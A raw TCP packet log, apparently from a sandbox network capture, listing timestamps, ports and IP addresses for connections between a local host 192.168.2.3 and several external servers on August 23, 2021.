Aug 23, 2021 02:09:09.317692995 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.317698956 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.317730904 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.317828894 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.317845106 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.343070030 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.343153954 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.343199015 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.343211889 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.343226910 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.343333960 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.343352079 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.348897934 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.348939896 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.348978043 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.349019051 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.349039078 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.349080086 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.349206924 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.370152950 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.370168924 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.370176077 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.370323896 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.374387980 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.374455929 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.374499083 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.374582052 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.374699116 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.374757051 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.374772072 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.374845982 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.374859095 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.374912977 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.374931097 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.374994040 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.375061035 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.375077009 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.375219107 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.375410080 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.376219988 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.376455069 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.376488924 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.396250963 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.396317959 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.396344900 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.397367954 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.397425890 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.397449017 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.397489071 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.397696972 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.397742033 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.400115013 CEST	49832	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.401246071 CEST	49834	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.401592970 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.402920008 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.426069975 CEST	80	49832	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.426167965 CEST	49832	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.427382946 CEST	80	49834	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.427544117 CEST	49834	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.437155008 CEST	49834	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.462433100 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.462464094 CEST	80	49834	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.462590933 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.463130951 CEST	80	49834	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.463191032 CEST	80	49834	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.463260889 CEST	49834	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.463413954 CEST	49834	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.464190006 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.464293957 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.465415955 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.465591908 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.465866089 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.466013908 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.517677069 CEST	80	49830	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:09.526437998 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.526488066 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.526511908 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.526530027 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.526591063 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.526621103 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.526665926 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.526698112 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.526793003 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.526865959 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.526890039 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.526957989 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.527041912 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.527136087 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.527170897 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.527261972 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.527318001 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.527398109 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.527518034 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.527587891 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.527821064 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.527903080 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.571695089 CEST	49834	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.572794914 CEST	49836	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.586843014 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.586886883 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.586905956 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.586941004 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.586951017 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.587009907 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.587030888 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.587030888 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.587102890 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.587327003 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.587409973 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.587435007 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.587522984 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.587825060 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.587893009 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.588262081 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.588326931 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.597461939 CEST	80	49834	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.597538948 CEST	49834	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.598366022 CEST	80	49836	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.598459005 CEST	49836	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.598998070 CEST	49836	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.624219894 CEST	80	49836	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.624845028 CEST	80	49836	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.624887943 CEST	80	49836	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.624912977 CEST	49836	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.624946117 CEST	49836	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.647720098 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.647854090 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.647893906 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.647945881 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.648169041 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.648216963 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.648262024 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.648305893 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.648466110 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.680604935 CEST	25802	49820	188.124.36.242	192.168.2.3
Aug 23, 2021 02:09:09.708483934 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.726639986 CEST	49820	25802	192.168.2.3	188.124.36.242
Aug 23, 2021 02:09:09.729118109 CEST	49836	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.730886936 CEST	49837	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.754467964 CEST	80	49836	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.754549980 CEST	49836	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.757317066 CEST	80	49837	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.757426023 CEST	49837	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.759079933 CEST	49837	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.771765947 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.771867990 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.784504890 CEST	80	49837	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.785136938 CEST	80	49837	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.785216093 CEST	49837	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.785260916 CEST	80	49837	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.785327911 CEST	49837	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.921834946 CEST	49837	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.947324991 CEST	80	49837	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.947417974 CEST	49837	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.952629089 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.977967024 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.978128910 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.004375935 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.029814959 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.030592918 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.030606985 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.030724049 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.035629034 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.035767078 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.045497894 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.045682907 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.061723948 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.071422100 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.071436882 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.071446896 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.071613073 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.071667910 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.096870899 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.096894979 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.096910000 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.097049952 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.097065926 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.097081900 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.097193003 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.097276926 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.097306013 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.123328924 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.123369932 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.123394012 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.123414040 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.123456001 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.123471975 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.124093056 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.124134064 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.124162912 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.124190092 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.135754108 CEST	49839	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.148658991 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.149705887 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.149725914 CEST	80	49838	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.149787903 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.149816036 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.150033951 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.150063038 CEST	49838	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.153652906 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.156407118 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.161067963 CEST	80	49839	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.161196947 CEST	49839	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.161962986 CEST	49839	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.187565088 CEST	80	49839	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.188766003 CEST	80	49839	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.188788891 CEST	80	49839	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.188930035 CEST	49839	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.212754011 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.212944984 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.213541031 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.213629007 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.213818073 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.213848114 CEST	80	49835	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.213913918 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.213958979 CEST	49835	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.269820929 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.270129919 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.270196915 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.270324945 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.270328999 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.270504951 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.270541906 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.270602942 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.270642042 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.270781994 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.270865917 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.270872116 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.271070957 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.271162033 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.271267891 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.271437883 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.271574974 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.271806002 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.322611094 CEST	49839	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.323800087 CEST	49841	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.326576948 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.326598883 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.326611042 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.326628923 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.326719999 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.326723099 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.326741934 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.326786041 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.326805115 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.326879978 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.326893091 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.326972008 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.326983929 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.327042103 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.327069044 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.327132940 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.327411890 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.327497005 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.327651978 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.327721119 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.328649998 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.348248959 CEST	80	49839	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.349231958 CEST	80	49841	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.349348068 CEST	49839	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.349379063 CEST	49841	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.349934101 CEST	49841	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.375180006 CEST	80	49841	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.375735044 CEST	80	49841	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.375777006 CEST	80	49841	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.375849009 CEST	49841	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.375880003 CEST	49841	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.382644892 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.382687092 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.382765055 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.382801056 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.382901907 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.382971048 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.382976055 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.383017063 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.383095980 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.383148909 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.383258104 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.383272886 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.383316994 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.383413076 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.383444071 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.383466005 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.383594036 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.383610010 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.383699894 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.383717060 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.384476900 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.384535074 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.438810110 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.438834906 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.438849926 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.438878059 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.438926935 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.438980103 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.439213037 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.439330101 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.439378977 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.439419985 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.439610004 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.439632893 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.439702034 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.439738035 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.440390110 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.440490961 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.478636980 CEST	49841	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.479266882 CEST	80	49830	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:10.479301929 CEST	80	49830	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:10.479464054 CEST	49830	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:10.479513884 CEST	49830	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:10.484136105 CEST	49842	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.495085955 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.495206118 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.495253086 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.495337963 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.495364904 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.495424032 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.495498896 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.495551109 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.496432066 CEST	80	49840	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:10.496516943 CEST	49840	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:10.503906965 CEST	80	49841	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.504028082 CEST	49841	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.510205984 CEST	80	49842	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.510334969 CEST	49842	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.511132002 CEST	49842	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.518652916 CEST	49843	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:10.539073944 CEST	80	49842	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.539769888 CEST	80	49842	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.539788961 CEST	80	49842	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:10.539844036 CEST	49842	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.539870024 CEST	49842	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:10.551182032 CEST	80	49840	185.215.113.206	192.168.2.3
